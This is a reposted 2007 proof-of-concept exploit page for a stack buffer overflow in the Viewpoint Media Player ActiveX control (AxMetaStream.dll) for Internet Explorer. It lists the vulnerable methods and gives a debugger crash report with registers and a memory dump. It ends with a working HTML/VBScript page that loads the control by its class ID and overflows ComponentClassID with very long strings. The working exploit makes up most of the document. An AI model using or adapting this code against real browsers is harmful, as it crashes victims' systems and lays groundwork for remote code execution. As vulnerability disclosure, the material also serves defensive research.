Viewpoint Media Player for IE 3.2 Remote Stack Overflow PoC

		当前位置：主页>安全文章>文章资料>Exploits>文章内容

Viewpoint Media Player for IE 3.2 Remote Stack Overflow PoC

来源：http://shinnai.altervista.org 作者：shinnai 发布时间：2007-11-07

<pre>
<code><body bgcolor="#E0E0E0">-----------------------------------------------------------------------------
Viewpoint Media Player for IE 3.2 (AxMetaStream.dll) Remote Stack Overflow
url: http://www.viewpoint.com

Author: shinnai
mail: shinnai[at]autistici[dot]org
site: http://shinnai.altervista.org

This was written for educational purpose. Use it at your own risk.
Author will be not responsible for any damage.

Tested on Windows XP Professional SP2 all patched, with Internet Explorer 7

Technical details:
File: AxMetaStream.dll
Version: 3.3.2.26 (other versions may also be vulnerable)
MD5 Hash: 3163B59E1C568C8C6EACA1EAB06FA851

Marked as:
RegKey Safe for Script: True
RegKey Safe for Init: True
Implements IObjectSafety: True
IDisp Safe: Safe for untrusted: caller,data
IPersist Safe: Safe for untrusted: caller,data
IPStorage Safe: Safe for untrusted: caller,data
KillBitSet: False

Bug description:
The AxMetaStream activex contains various methods which accept parameters as String.
All these methods are vulnerable to a stack based buffer overflow when you pass an
overly long (greater than 6999 characters).
This is the list of all vulnerable methods:

BroadcastKey()
BroadcastKeyFileURL()
Component()
ComponentClassID()
ComponentFileName()
ExtraProperty()
Properties()
RequiredVersions()
Source()
XMLText()

Product description (from <a href='http://en.wikipedia.org/wiki/Viewpoint_Media_Player'>http://en.wikipedia.org/wiki/Viewpoint_Media_Player</a>)

Viewpoint Media Player is a web browser plug-in that enables users to
view 3D content and other rich media, such as Flash content and video,
on the Internet.
Viewpoint Media Player is included with AOL Instant Greetings, AIM
Themes and some other web applications.
Viewpoint Media Player is distributed with AOL, AIM, versions of Netscape,
certain Adobe products, and some retail computers sold today.
Despite this, these applications will most often work perfectly when Viewpoint
is removed.
A few companies, ranging from online retailers to auto manufacturers,
use Viewpoint Media Player as the graphics platform for interactive 3D tours
of their products.
Viewpoint Media Player powers product tours of the Toyota 4Runner and Sony laptop,
desktop, and server computing products. Despite the arguable usefulness of Viewpoint,
the vast majority of sites will stay away from it, and in practice not having
Viewpoint installed is not going to be an issue.

This is a report at the moment of the overflow using first exploit:

1) Disassembly:
 77C172E3 F3:A5 REP MOVS DWORD PTR ES:[EDI],DWORD PTR DS:[ESI] <- CRASH

2) Registers:
 EAX 026A26E4
 ECX 000005B9
 EDX 00000000
 EBX 0269F00C
 ESP 0188B668
 EBP 0188B670
 ESI 026A1000
 EDI 0269F494 ASCII "BBBBBBBBBB..."
 EIP 77C172E3 msvcrt.77C172E3

3) Panel:
 ECX=000005B9 (decimal 1465.)
 DS:[ESI]=[026A1000]=???
 ES:[EDI]=[0269F494]=42424242

4) Dump:
 02681494 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 BBBBBBBBBBBBBBBB
 026814A4 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 BBBBBBBBBBBBBBBB
 026814B4 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 BBBBBBBBBBBBBBBB
 026814C4 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 BBBBBBBBBBBBBBBB
 026814D4 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 BBBBBBBBBBBBBBBB
--------------------------------------------------------------------------------
<object classid='clsid:03F998B2-0E00-11D3-A498-00104B6EB52E' id='test' style='width: 1px; height: 1px'></object>

<input language=VBScript onclick=expl1() type=button value='Exploit #1'>

<input language=VBScript onclick=expl2() type=button value='Exploit #2'>

<script language='VBScript'>
Sub expl1
For i = 1 to 3
 buff = String(7000, "B")
 test.ComponentClassID = buff
Next
End Sub

Sub Expl2
buff = String(600000, "B")
test.ComponentClassID = buff
End Sub
</script>

</code></pre>

[